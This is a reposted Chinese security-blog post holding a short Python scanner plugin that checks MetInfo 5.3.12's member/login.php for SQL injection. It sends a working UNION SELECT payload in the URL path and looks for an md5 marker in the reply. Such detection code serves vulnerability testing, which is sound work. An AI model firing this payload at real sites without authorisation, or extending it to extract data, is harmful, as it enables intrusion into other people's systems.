Python

MetInfo_5.3.12_member/login.php_SQL注入漏洞检测

字号+ 作者:love_liufeng 来源:转载 2016-12-24 14:05 我要评论( )

#!/usr/bin/env python # -*- coding: utf-8 -*- #_PlugName_ = MetInfo 5.3.12 注入漏洞 #__Refer___ = http://0day5.com/archives/4193 import re def assign (s......

#!/usr/bin/env python
# -*- coding: utf-8 -*-
#_PlugName_ = MetInfo 5.3.12 注入漏洞
#__Refer___ = http://0day5.com/archives/4193
import re
def assign(service, arg):
    if service == fingerprint.metinfo:
        return True, arg
def audit(arg):
    payload = 'member/login.php/aa\'UNION%20SELECT%20concat(0x7e7e7e,md5(123),0x7e7e7e),2,3,4,5,6,1111,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29%23/aa'
    target = arg + payload

    code, head, res, final_url, log= hackhttp.http(target)
    result = re.search("~~~(.*?)~~~", res)
    if result and result.group(1) == "202cb962ac59075b964b07152d234b70":
        security_hole(target, log=log)
if __name__ == '__main__':
    from dummy import *
    audit(assign(fingerprint.metinfo, 'http://www.example.com/')[1])

本文来自: 蜗蜗侠's Blog-关注网络安全 http://blog.icxun.cn/Python/473.html

1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,请转载时务必注明文章作者和来源,不尊重原创的行为我们将追究责任;3.作者投稿可能会经我们编辑修改或补充。

相关文章
网友点评
暂时未开启评论功能~